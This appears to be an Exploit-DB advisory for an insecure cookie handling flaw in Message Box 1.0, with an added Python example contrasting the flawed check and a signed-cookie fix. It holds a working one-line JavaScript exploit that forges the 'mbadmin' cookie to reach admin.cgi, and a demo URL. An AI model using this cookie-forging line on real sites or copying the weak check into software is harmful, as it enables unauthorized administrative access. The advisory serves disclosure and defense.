Vendor: Message Box
By: TiGeR-Dz
CVSS: 7,5 (HIGH)
Vulnerability: Insecure Cookie Handling
CWE: 614
Product Name: Message Box
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mrcgiguy:message_box:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Message Box Version 1.0 Insecure Cookie Handling Vulnerability

Message Box Version 1.0 contains an insecure cookie handling vulnerability. An attacker can exploit it by setting the mbadmin cookie to 'logged in' and then accessing the admin.cgi page.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.
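
The server-side check this mitigation calls for, as an added example that is not part of the original advisory or Message Box's own code: is_admin_weak reconstructs the behaviour described above (the page does not show admin.cgi's source), and the hardened functions replace the constant cookie value with an HMAC-signed, expiring token. Python is used for illustration; all function names, the key and the TTL are assumptions.

```python
import hashlib
import hmac
import secrets
import time
from http.cookies import CookieError, SimpleCookie
from urllib.parse import unquote

SERVER_KEY = secrets.token_bytes(32)  # constructed for the example; load from protected storage in practice
SESSION_TTL = 1800                    # seconds an admin session stays valid (assumed value)


def _cookie_value(cookie_header, name="mbadmin"):
    """Return the named cookie's raw value from a Cookie header, or None."""
    jar = SimpleCookie()
    try:
        jar.load(cookie_header)
    except CookieError:
        return None
    return jar[name].value if name in jar else None


def is_admin_weak(cookie_header):
    """Reconstruction of the flaw: a constant, client-settable value grants access."""
    value = _cookie_value(cookie_header)
    return value is not None and unquote(value) == "logged in"


def _mac(payload):
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_admin_cookie(now=None):
    """Build the Set-Cookie value; call only after the admin password check succeeds."""
    expires = int((time.time() if now is None else now) + SESSION_TTL)
    payload = f"{expires}.{secrets.token_hex(8)}"
    return f"mbadmin={payload}.{_mac(payload)}; Path=/; HttpOnly; Secure; SameSite=Strict"


def is_admin_hardened(cookie_header, now=None):
    """Accept only an unexpired token carrying a valid server-side MAC."""
    value = _cookie_value(cookie_header)
    if value is None:
        return False
    payload, _, mac = value.rpartition(".")
    if not hmac.compare_digest(mac.encode(), _mac(payload).encode()):
        return False
    expires = payload.split(".", 1)[0]
    return expires.isdigit() and int(expires) > (time.time() if now is None else now)
```

The token is stateless, so logging out before expiry requires rotating the key or keeping a server-side revocation list.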
Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
Message Box Version 1.0 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.mrcgiguy.com
Script:Message Box Version 1.0
Download:http://www.mrcgiguy.com/message_box.html
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="mbadmin=logged%20in;path=/";
----------------------------------------------------------------
Dem0
----
http://www.mrcgiguy.com/cgi-bin/messagebox/admin.cgi
--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-14]